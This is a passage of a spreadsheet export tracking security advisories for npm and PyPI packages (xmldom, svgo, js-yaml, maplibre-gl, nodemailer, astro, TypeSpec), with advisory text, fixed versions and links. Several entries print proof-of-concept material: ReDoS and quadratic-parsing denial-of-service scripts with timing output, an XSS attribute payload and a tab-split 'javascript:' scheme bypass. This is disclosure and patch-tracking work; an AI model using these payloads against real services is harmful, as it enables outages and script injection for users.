new XMLSerializer().serializeToString(doc, { requireWellFormed: true });
//   InvalidStateError: DocumentType publicId is not a valid PubidLiteral
```
### Why the default stays verbatim
The W3C DOM Parsing "require well-formed" flag defaults to false, and a browser `XMLSerializer` emits
the DOCTYPE verbatim. Unconditionally throwing on a malformed `publicId`/`systemId` would be an
unjustified breaking change to the default path, so the fix tightens only the opt-in
`requireWellFormed` validator, matching browser and spec defaults.
### Residual limitation
The guarantee holds only for callers that pass `{ requireWellFormed: true }`; the default
serialization path still emits `publicId`/`systemId` verbatim. `publicId` and `systemId` are not
validated at creation (`createDocumentType`) or on direct property assignment
(`documentType.publicId = …`) — the WHATWG DOM specification places no well-formedness constraint on
these fields at creation time, so the serializer is the spec-aligned enforcement point.</t>
        </is>
      </c>
      <c r="T1064" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83618</t>
        </is>
      </c>
    </row>
    <row r="1065">
      <c r="A1065" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1065" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1065" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83619</t>
        </is>
      </c>
      <c r="D1065" s="5" t="inlineStr"/>
      <c r="E1065" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1065" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1065" s="5" t="inlineStr"/>
      <c r="H1065" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1065" s="5" t="inlineStr"/>
      <c r="J1065" s="5" t="inlineStr"/>
      <c r="K1065" s="5" t="inlineStr"/>
      <c r="L1065" s="5" t="inlineStr">
        <is>
          <t>npm:@xmldom/xmldom</t>
        </is>
      </c>
      <c r="M1065" s="5" t="inlineStr">
        <is>
          <t>0.8.15</t>
        </is>
      </c>
      <c r="N1065" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1065" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1065" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1065" s="5" t="inlineStr"/>
      <c r="R1065" s="5" t="inlineStr"/>
      <c r="S1065" s="5" t="inlineStr">
        <is>
          <t>## Summary
On the `@xmldom/xmldom` **`0.8.x`** line, parsing an XML end tag whose name is followed by a long run
of whitespace and then a non-whitespace character triggers quadratic-time regular-expression
backtracking (ReDoS), so a single small crafted end tag stalls the Node.js event loop. It is reachable
from `DOMParser.parseFromString` under **default options**, unauthenticated, before any validity
check — an availability-only denial of service. The `0.9.x` line is **not** affected.
## Details
`lib/sax.js` (release-0.8.x, commit `e5c1480`) trims trailing whitespace from a captured end-tag name
with an unanchored global regex:
- `lib/sax.js` line 120: https://github.com/xmldom/xmldom/blob/e5c14802592685bb872c042c54c3f73758875c85/lib/sax.js#L120
```js
/[ \t\n\r]+$/g
```
Applied to a string shaped `whitespace-run + one non-whitespace char` (e.g. the content of an end tag
`&lt;/   …   x&gt;`), the engine must, for every starting position, extend `[ws]+` to the end and then fail
the `$` anchor when the trailing non-whitespace char is present — classic O(n²) backtracking in the
length of the whitespace run. The trimmed substring is delimited only by `indexOf('&gt;')`, so the
attacker controls its length directly.
## Proof of Concept
```js
const { DOMParser } = require('@xmldom/xmldom'); // 0.8.x
const n = 64 * 1024;
const payload = '&lt;r&gt;&lt;/' + ' '.repeat(n) + 'x&gt;';
console.time('parse');
new DOMParser().parseFromString(payload, 'text/xml');
console.timeEnd('parse');
```
Measured (Node 18) — time quadruples per doubling of the whitespace run (canonical O(n²)):
| Whitespace run | Isolated regex | End-to-end `parseFromString` (0.8.13) |
|---|---|---|
|  4 KB | 5.6 ms   | 5.7 ms   |
|  8 KB | 22.7 ms  | 22.5 ms  |
| 16 KB | 88.6 ms  | 92 ms    |
| 32 KB | 354 ms   | 361 ms   |
| 64 KB | 1434 ms  | 1452 ms  |
| 128 KB | 5761 ms | —        |
## Impact
Availability only: a single parse of a small crafted document blocks the Node.js event loop for the
duration of the quadratic scan (≈1.4 s at 64 KB; multi-second with larger inputs). No memory
blow-up, no data exposure, no integrity impact. Because XML is routinely accepted from untrusted
sources and parsed with default options, one request can stall a server.
## Affected Versions
Affected on the `0.7.x` and `0.8.x` lines (the trailing-whitespace trim was added in `0.7.0`, present
through `0.8.14`); the fix targets the `0.8.x` LTS patch. The `0.9.x` line rewrote end-tag parsing to
an anchored linear matcher and never had this regex, so it is **not** affected. No published unscoped
`xmldom` is affected — the vulnerable code exists only in a `0.7.0` git tag that was never released to
npm (`npm view xmldom` → `latest` = 0.6.0).
## Fix Applied
Anchors the end-tag trailing-whitespace trim so it runs in linear time instead of
backtracking quadratically on a long whitespace run. Byte-identical output. Non-breaking; 0.8.x-only.
## Severity note
The complexity is **quadratic**, not exponential, so a multi-second stall requires
tens-to-hundreds of KB of input. `VA:H` reflects that xmldom applies **no input-size limit** and the
path runs on default-options parsing, so a single unbounded parse can fully stall the event loop.</t>
        </is>
      </c>
      <c r="T1065" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83619</t>
        </is>
      </c>
    </row>
    <row r="1066">
      <c r="A1066" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1066" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1066" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84370</t>
        </is>
      </c>
      <c r="D1066" s="5" t="inlineStr"/>
      <c r="E1066" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1066" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1066" s="5" t="inlineStr"/>
      <c r="H1066" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1066" s="5" t="inlineStr"/>
      <c r="J1066" s="5" t="inlineStr"/>
      <c r="K1066" s="5" t="inlineStr"/>
      <c r="L1066" s="5" t="inlineStr">
        <is>
          <t>npm:svgo</t>
        </is>
      </c>
      <c r="M1066" s="5" t="inlineStr">
        <is>
          <t>2.8.4, 3.3.5, 4.1.0</t>
        </is>
      </c>
      <c r="N1066" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1066" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1066" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1066" s="5" t="inlineStr"/>
      <c r="R1066" s="5" t="inlineStr"/>
      <c r="S1066" s="5" t="inlineStr">
        <is>
          <t>## Summary
SVGO's opt-in `removeScripts` plugin failed to remove some executable links. Namespace-prefixed SVG anchors and URL schemes containing ASCII tabs or newlines could bypass its checks. Applications that used this plugin as their only protection for untrusted SVG input could expose users to cross-site scripting (XSS).
SVGO is an optimizer rather than a comprehensive sanitization library, but `removeScripts` is maintained for consumers that already rely on it to remove common script execution paths.
## Details
Two related bypasses were present:
1. The plugin inspected unprefixed SVG `&lt;a&gt;` elements but did not recognize namespace-prefixed SVG anchors such as `&lt;svg:a&gt;` when the prefix was bound to the SVG namespace. Their executable `href` or namespaced `*:href` values remained intact.
2. The URL check did not account for ASCII tab, line-feed, or carriage-return characters embedded in a scheme. Browsers remove these characters before parsing the scheme, so values such as `java&amp;#9;script:` could remain executable after bypassing the plugin's `javascript:` check.
Anchors in unrelated custom namespaces are not executable SVG anchors and remain untouched.
## Impact
If an application optimized attacker-controlled SVGs with `removeScripts` and then served the result in an active browser context, a victim could follow a link that executes script in the SVG's origin. Depending on the embedding and origin configuration, this could expose cookies or local storage, modify content, or perform actions as the victim.
The plugin is opt-in, so consumers that do not enable it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makes SVG anchor handling namespace-aware and strips ASCII tabs, line feeds, and carriage returns before checking executable URL schemes.
SVGO v1 is no longer maintained. Users of v1 should upgrade to a supported release line.
## Workarounds
For hostile input, use a dedicated SVG sanitization tool before passing the SVG to SVGO. Applications can also reject links from untrusted SVG input and avoid serving user-controlled SVGs in an active same-origin context.
## References
- v4 fix: https://github.com/svg/svgo/pull/2268
- related executable URL hardening: https://github.com/svg/svgo/pull/2263
- v3 backport: https://github.com/svg/svgo/pull/2269
- v2 backport: https://github.com/svg/svgo/pull/2272
- v4.1.0 release: https://github.com/svg/svgo/releases/tag/v4.1.0
- v3.3.5 release: https://github.com/svg/svgo/releases/tag/v3.3.5
- v2.8.4 release: https://github.com/svg/svgo/releases/tag/v2.8.4</t>
        </is>
      </c>
      <c r="T1066" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84370</t>
        </is>
      </c>
    </row>
    <row r="1067">
      <c r="A1067" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1067" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84375</t>
        </is>
      </c>
      <c r="D1067" s="5" t="inlineStr"/>
      <c r="E1067" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1067" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1067" s="5" t="inlineStr"/>
      <c r="H1067" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1067" s="5" t="inlineStr"/>
      <c r="J1067" s="5" t="inlineStr"/>
      <c r="K1067" s="5" t="inlineStr"/>
      <c r="L1067" s="5" t="inlineStr">
        <is>
          <t>npm:js-yaml</t>
        </is>
      </c>
      <c r="M1067" s="5" t="inlineStr">
        <is>
          <t>3.15.2, 4.3.2</t>
        </is>
      </c>
      <c r="N1067" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1067" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1067" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1067" s="5" t="inlineStr"/>
      <c r="R1067" s="5" t="inlineStr"/>
      <c r="S1067" s="5" t="inlineStr">
        <is>
          <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An attacker can submit a relatively small YAML document that causes prolonged CPU consumption despite the default `maxTotalMergeKeys` limit.
## Fix
Count each merge-source mapping as one budget unit, in addition to counting its keys.
## Difference with v5
In v3 &amp; v4, merge is enabled by default. So, the severity score is higher.</t>
        </is>
      </c>
      <c r="T1067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84375</t>
        </is>
      </c>
    </row>
    <row r="1068">
      <c r="A1068" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1068" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84381</t>
        </is>
      </c>
      <c r="D1068" s="5" t="inlineStr"/>
      <c r="E1068" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1068" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1068" s="5" t="inlineStr"/>
      <c r="H1068" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1068" s="5" t="inlineStr"/>
      <c r="J1068" s="5" t="inlineStr"/>
      <c r="K1068" s="5" t="inlineStr"/>
      <c r="L1068" s="5" t="inlineStr">
        <is>
          <t>PyPI:httpcore2, PyPI:httpx2</t>
        </is>
      </c>
      <c r="M1068" s="5" t="inlineStr">
        <is>
          <t>2.10.0</t>
        </is>
      </c>
      <c r="N1068" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1068" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1068" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1068" s="5" t="inlineStr"/>
      <c r="R1068" s="5" t="inlineStr"/>
      <c r="S1068" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84381</t>
        </is>
      </c>
    </row>
    <row r="1069">
      <c r="A1069" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1069" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1069" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84382</t>
        </is>
      </c>
      <c r="D1069" s="5" t="inlineStr"/>
      <c r="E1069" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1069" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1069" s="5" t="inlineStr"/>
      <c r="H1069" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1069" s="5" t="inlineStr"/>
      <c r="J1069" s="5" t="inlineStr"/>
      <c r="K1069" s="5" t="inlineStr"/>
      <c r="L1069" s="5" t="inlineStr">
        <is>
          <t>PyPI:httpx2</t>
        </is>
      </c>
      <c r="M1069" s="5" t="inlineStr">
        <is>
          <t>2.12.0</t>
        </is>
      </c>
      <c r="N1069" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1069" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1069" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1069" s="5" t="inlineStr"/>
      <c r="R1069" s="5" t="inlineStr"/>
      <c r="S1069" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84382</t>
        </is>
      </c>
    </row>
    <row r="1070">
      <c r="A1070" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1070" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1070" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84452</t>
        </is>
      </c>
      <c r="D1070" s="5" t="inlineStr"/>
      <c r="E1070" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1070" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1070" s="5" t="inlineStr"/>
      <c r="H1070" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I1070" s="5" t="inlineStr"/>
      <c r="J1070" s="5" t="inlineStr"/>
      <c r="K1070" s="5" t="inlineStr"/>
      <c r="L1070" s="5" t="inlineStr">
        <is>
          <t>PyPI:winml-cli</t>
        </is>
      </c>
      <c r="M1070" s="5" t="inlineStr">
        <is>
          <t>0.4.0</t>
        </is>
      </c>
      <c r="N1070" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1070" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1070" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q1070" s="5" t="inlineStr"/>
      <c r="R1070" s="5" t="inlineStr"/>
      <c r="S1070" s="5" t="inlineStr">
        <is>
          <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
        </is>
      </c>
      <c r="T1070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84452</t>
        </is>
      </c>
    </row>
    <row r="1071">
      <c r="A1071" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1071" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1071" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85061</t>
        </is>
      </c>
      <c r="D1071" s="5" t="inlineStr"/>
      <c r="E1071" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1071" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1071" s="5" t="inlineStr"/>
      <c r="H1071" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1071" s="5" t="inlineStr"/>
      <c r="J1071" s="5" t="inlineStr"/>
      <c r="K1071" s="5" t="inlineStr"/>
      <c r="L1071" s="5" t="inlineStr">
        <is>
          <t>npm:maplibre-gl</t>
        </is>
      </c>
      <c r="M1071" s="5" t="inlineStr">
        <is>
          <t>6.4.1</t>
        </is>
      </c>
      <c r="N1071" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1071" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1071" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1071" s="5" t="inlineStr"/>
      <c r="R1071" s="5" t="inlineStr"/>
      <c r="S1071" s="5" t="inlineStr">
        <is>
          <t>### Impact
`DOM.sanitize()` in `src/util/dom.ts` iterated `elem.attributes` (a live `NamedNodeMap`) while calling `elem.removeAttribute()` in the same loop. Removing an attribute shifts subsequent attributes down by one index, causing the iterator to skip the adjacent attribute.
An attacker can provide an HTML payload with consecutive dangerous attributes (such as `&lt;details open onload="1" ontoggle="..."&gt;`). The first attribute is stripped while the second survives and executes upon insertion into `innerHTML` via the attribution control without requiring user interaction (zero-click XSS).
Applications rendering untrusted/third-party style attribution strings or user-supplied custom attributions are impacted.
### Patches
The issue has been resolved by creating a static snapshot of attributes using `Array.from(elem.attributes)` before iteration. Please upgrade to `maplibre-gl` version **6.4.1** (or latest).
### Workarounds
Sanitizing the attribute field of a source before passing it down to maplibre</t>
        </is>
      </c>
      <c r="T1071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85061</t>
        </is>
      </c>
    </row>
    <row r="1072">
      <c r="A1072" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1072" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1072" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92596</t>
        </is>
      </c>
      <c r="D1072" s="5" t="inlineStr"/>
      <c r="E1072" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1072" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1072" s="5" t="inlineStr"/>
      <c r="H1072" s="5" t="inlineStr"/>
      <c r="I1072" s="5" t="inlineStr"/>
      <c r="J1072" s="5" t="inlineStr"/>
      <c r="K1072" s="5" t="inlineStr"/>
      <c r="L1072" s="5" t="inlineStr">
        <is>
          <t>npm:nodemailer</t>
        </is>
      </c>
      <c r="M1072" s="5" t="inlineStr">
        <is>
          <t>9.1.0</t>
        </is>
      </c>
      <c r="N1072" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1072" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1072" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q1072" s="5" t="inlineStr"/>
      <c r="R1072" s="5" t="inlineStr"/>
      <c r="S1072" s="5" t="inlineStr">
        <is>
          <t>### Summary
Nodemailer's address parser (`lib/addressparser/index.js`) parses a list of comma‑separated addresses in **quadratic time — O(n²)** in the number of addresses. A single crafted address string (e.g. a `To`, `Cc`, `Bcc`, `From`, or `Reply‑To` value, or any value passed to the exported `addressparser`) therefore consumes CPU proportional to the **square** of its length and blocks Node's single‑threaded event loop for the entire duration, denying service to every other request in the process.
This requires **no special application configuration and no cooperating receiver** — it is entirely inside the parser and triggers on the library's default code path. A ~1.5 MB address value freezes the process for ~25–30 seconds of 100% CPU; the cost grows with the square of the input, so a few‑MB value stalls the server for minutes. It is a distinct issue from the recursion DoS fixed as CVE‑2025‑14874 (that path is guarded by a nesting‑depth cap; this one is a flat, comma‑separated list with no such limit).
### Details
`addressparser` tokenizes the input, splits it into per‑address token groups, and then accumulates the parsed results in a loop (`lib/addressparser/index.js`, ~lines 500–505):
```js
addresses.forEach(addr =&gt; {
    const handled = _handleAddress(addr, depth);
    if (handled.length) {
        parsedAddresses = parsedAddresses.concat(handled);   // &lt;-- line ~503
    }
});
```
`Array.prototype.concat` builds and returns a **new** array containing a copy of every element accumulated so far. Reassigning `parsedAddresses = parsedAddresses.concat(handled)` on each of the *n* iterations copies 1 + 2 + 3 + … + n elements in total, i.e. **O(n²)** work (and O(n²) transient allocations) for an input containing *n* addresses. Tokenization and `_handleAddress` themselves are linear; the quadratic blowup is entirely this accumulator.
**Root‑cause proof.** Replacing only that line with an in‑place append and re‑running the exact same input:
```
parsedAddresses = parsedAddresses.concat(handled);      -&gt;  100000 addresses:  ~6068 ms
parsedAddresses.push.apply(parsedAddresses, handled);   -&gt;  100000 addresses:  ~51 ms   (≈119x faster, now linear)
```
**Measured scaling** (nodemailer 9.0.6, `'a@b.com,'.repeat(n)`):
| addresses n | input size | parse time | ratio for 2× input |
|---|---|---|---|
| 25,000  | 0.19 MB | ~0.35 s | – |
| 50,000  | 0.38 MB | ~1.4 s  | ×4.0 |
| 100,000 | 0.76 MB | ~6–8 s  | ×3.9 |
| 200,000 | 1.53 MB | ~25–30 s| ×4.1 |
Doubling the input quadruples the time — the signature of O(n²).
**Reachability.** The parser is invoked on any structured‑address header value on the normal send path (`MimeNode.setHeader('To'/'Cc'/'Bcc'/'From'/'Reply-To', value)` → `_parseAddresses` → `addressparser`, and `getEnvelope()`), so a single `transport.sendMail({ to: &lt;crafted string&gt; })` triggers it. It is also reached directly through the **exported** `require('nodemailer/lib/addressparser')`, which many applications call to validate or display user‑supplied recipient lists. Confirmed via the public API: `setHeader('To', 'a@b.com,'.repeat(80000))` + `getEnvelope()` blocks for ~3.9 s.
**Suggested fix:** accumulate in place instead of rebuilding the array each iteration, e.g. `parsedAddresses.push.apply(parsedAddresses, handled);` (or `for (const h of handled) parsedAddresses.push(h);`). Optionally cap the number of addresses / input length before parsing.
### PoC
Environment: Node.js ≥ 18 and the published `nodemailer@9.0.6`. No transport, network, or configuration required — the cost is in parsing.
`poc-dos.js`:
```js
'use strict';
const addressparser = require('nodemailer/lib/addressparser');
console.log('addresses | input size | parse time');
for (const n of [25000, 50000, 100000, 200000]) {
  const payload = 'a@b.com,'.repeat(n);        // n valid, comma-separated recipients
  const t0 = process.hrtime.bigint();
  addressparser(payload);                       // blocks synchronously
  const ms = Number(process.hrtime.bigint() - t0) / 1e6;
  console.log(String(n).padStart(9) + ' | ' + (payload.length / 1048576).toFixed(2) + ' MB   | ' + ms.toFixed(0).padStart(7) + ' ms');
}
```
Run:
```
npm init -y &amp;&amp; npm install nodemailer@9.0.6
node poc-dos.js
```
Actual output (nodemailer 9.0.6):
```
addresses | input size | parse time
    25000 | 0.19 MB   |     381 ms
    50000 | 0.38 MB   |    1435 ms
   100000 | 0.76 MB   |    7949 ms
   200000 | 1.53 MB   |   25154 ms
```
Equivalent trigger through the normal send API (freezes the event loop):
```js
const nodemailer = require('nodemailer');
nodemailer.createTransport({ jsonTransport: true })
  .sendMail({ from: 'a@b.com', to: 'a@b.com,'.repeat(150000), subject: 'x', text: 'y' });
// ~15+ seconds of 100% CPU inside addressparser before anything is sent
```
### Impact
* **Who is impacted:** any service that runs Nodemailer (or the standalone `nodemailer/lib/addressparser`) on an address value that can be influenced by an untrusted party — a recipient field in a "send email / invite / share" feature, a `Reply‑To`/`From` derived from user input, a contact‑import or mailing‑list parser, or any endpoint that validates addresses with `addressparser`. No authentication, special option, or particular receiver is needed.
## Patched in 9.1.0
Three separate quadratic paths were fixed, not one:
* `addressparser` rebuilt its accumulator with `concat()` on every address ([9116da9](https://github.com/nodemailer/nodemailer/commit/9116da9)).
* The display-name merge loop directly below spliced each fragment out of the array, the same shape reached through `'a, b &lt;c@d.com&gt;,'.repeat(n)` (same commit).
* `MimeNode#_convertAddresses` checked recipient uniqueness with a linear scan per address ([7cc38af](https://github.com/nodemailer/nodemailer/commit/7cc38af), refined in [34da642](https://github.com/nodemailer/nodemailer/commit/34da642)). This was the most severe of the three and the reported proof of concept did not reach it: `'a@b.com,'.repeat(n)` is one address repeated, which dedupes to a single envelope entry. A list of *distinct* recipients cost O(n^2) here, taking ~35s for 100k even after `addressparser` was fixed.
Fixed alongside: `[].concat.apply` in `_parseAddresses` threw `RangeError: Maximum call stack size exceeded` past roughly 124k recipients, with no crafted input needed ([83b8c48](https://github.com/nodemailer/nodemailer/commit/83b8c48)).
Parsing 200k addresses now takes ~80ms instead of ~25s, and every path scales linearly. A new `maxRecipients` option (default 100000) throws rather than truncating, as a backstop.</t>
        </is>
      </c>
      <c r="T1072" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92596</t>
        </is>
      </c>
    </row>
    <row r="1073">
      <c r="A1073" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1073" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1073" s="5" t="inlineStr">
        <is>
          <t>GHSA-26w7-cxv4-gfx2</t>
        </is>
      </c>
      <c r="D1073" s="5" t="inlineStr"/>
      <c r="E1073" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F1073" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1073" s="5" t="inlineStr"/>
      <c r="H1073" s="5" t="inlineStr"/>
      <c r="I1073" s="5" t="inlineStr"/>
      <c r="J1073" s="5" t="inlineStr"/>
      <c r="K1073" s="5" t="inlineStr"/>
      <c r="L1073" s="5" t="inlineStr">
        <is>
          <t>npm:astro</t>
        </is>
      </c>
      <c r="M1073" s="5" t="inlineStr">
        <is>
          <t>7.2.8</t>
        </is>
      </c>
      <c r="N1073" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1073" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1073" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1073" s="5" t="inlineStr"/>
      <c r="R1073" s="5" t="inlineStr"/>
      <c r="S1073" s="5" t="inlineStr">
        <is>
          <t>A vulnerability in `libheif`, used by the default Sharp image service in Astro, can lead to remote code execution when a malicious AVIF image is optimized.
Projects are affected when an attacker can cause Astro to process an untrusted AVIF image.
The fix was released in Astro 7.2.8, which requires Sharp 0.35.4.</t>
        </is>
      </c>
      <c r="T1073" s="6" t="inlineStr">
        <is>
          <t>https://osv.dev/vulnerability/GHSA-26w7-cxv4-gfx2</t>
        </is>
      </c>
    </row>
    <row r="1074">
      <c r="A1074" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1074" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1074" s="5" t="inlineStr">
        <is>
          <t>GHSA-2q42-4q24-7rgv</t>
        </is>
      </c>
      <c r="D1074" s="5" t="inlineStr"/>
      <c r="E1074" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1074" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1074" s="5" t="inlineStr"/>
      <c r="H1074" s="5" t="inlineStr"/>
      <c r="I1074" s="5" t="inlineStr"/>
      <c r="J1074" s="5" t="inlineStr"/>
      <c r="K1074" s="5" t="inlineStr"/>
      <c r="L1074" s="5" t="inlineStr">
        <is>
          <t>npm:@typespec/compiler, npm:@typespec/openapi3</t>
        </is>
      </c>
      <c r="M1074" s="5" t="inlineStr"/>
      <c r="N1074" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1074" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1074" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1074" s="5" t="inlineStr"/>
      <c r="R1074" s="5" t="inlineStr"/>
      <c r="S1074" s="5" t="inlineStr">
        <is>
          <t>### Summary
The `@typespec/openapi3` emitter retains the value of a `@versioned` enum member and interpolates it into the output filename as `{version}` without sanitizing path separators or traversal components. The completed path reaches the compiler's `emitFile()`, which creates the parent directory and writes the file without verifying containment under `emitterOutputDir`.
A crafted declarative `.tsp` input can therefore create or overwrite an OpenAPI-formatted `.yaml` or `.json` file outside the configured output tree, subject to the compiler process's filesystem permissions. No executable TypeSpec extension or attacker-controlled JavaScript is required.
### Affected version
Confirmed on:
- `@typespec/compiler` `1.15.0`
- `@typespec/openapi3` `1.15.0`
- `@typespec/http` `1.15.0`
- `@typespec/versioning` `0.85.0`
- release tag commit `f30cd352f93997e04c75d48c7ace6947a1d5d07a`
The critical `openapi.ts` and `emitter-utils.ts` blobs are unchanged on main commit `365ec52b50b82cd9e1e037de4c6fcd5de7e32e90` as checked on 2026-08-19. No patched version was identified.
### Root cause
The value originates at `packages/openapi3/src/openapi.ts:592-608`:
```ts
serviceRecord.versions.push({
  service,
  version: snapshot.version!.value,
  document: document[0],
  diagnostics: document[1],
});
```
